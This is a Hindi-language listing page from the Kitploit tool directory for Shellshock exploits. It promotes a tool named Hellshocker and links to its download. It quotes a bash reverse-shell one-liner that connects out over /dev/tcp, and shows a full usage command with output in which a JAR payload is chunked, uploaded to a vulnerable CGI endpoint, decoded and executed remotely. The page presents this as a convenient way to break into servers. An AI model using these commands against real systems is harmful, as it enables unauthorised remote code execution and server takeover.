Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271 — Shellshock शोषण स्क्रिप्ट जो अपनी बहुमुखी प्रतिभा के कारण किसी भी vector का उपयोग करके अपलोड और RCE करने में सक्षम है। | Kitploit
उपकरण/GitHubGitHub/0x00-0x00/cve-2014-6271
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHub0x00-0x00/cve-2014-6271

CVE-2014-6271

Shellshock शोषण स्क्रिप्ट जो अपनी बहुमुखी प्रतिभा के कारण किसी भी vector का उपयोग करके अपलोड और RCE करने में सक्षम है।

रिपॉजिटरी देखें
3228 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Hellshocker 0.1.1

Shellshock कमजोरी का शोषण करने के लिए उपकरण

कमजोर shellshock एक्सप्लॉइट्स का उपयोग करके या सिर्फ "/bin/bash >& /dev/tcp/IP/port 0>&1" के माध्यम से सर्वर में घुसने से थक गए हैं?

हाँ, आपको सर्वर पर कुछ अधिक जटिल अपलोड और निष्पादित करने की आवश्यकता है, और एक बड़ी फ़ाइल को base64 में एनकोड करना आपके HTTP अनुरोध के लिए वेब-सर्वर द्वारा स्वीकार किए जाने के लिए असंभव है।

आपकी समस्याएं इस उपकरण के साथ समाप्त हो सकती हैं। यह आपके पेलोड को base64 में एनकोड करने और इसे (डिफ़ॉल्ट रूप से) 128 बाइट्स के हिस्सों में वेबसर्वर को भेजने में सक्षम है, और फिर, भेजे जाने के बाद, यह डिकोड और निष्पादित हो जाता है।

"वाह", आप कहते हैं, "लेकिन मेरे पास PHP नहीं है, मुझे Java के लिए कुछ चाहिए।" कोई समस्या नहीं, मैं कहता हूँ, यह उपकरण अत्यधिक अनुकूलन योग्य है।

बस इसे देखें:

root@kitploit:~
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.

फिर आपका पेलोड सफलतापूर्वक स्थानांतरित और निष्पादित हो गया। कूल, है ना? हाँ, यह है।

टूल डाउनलोड करें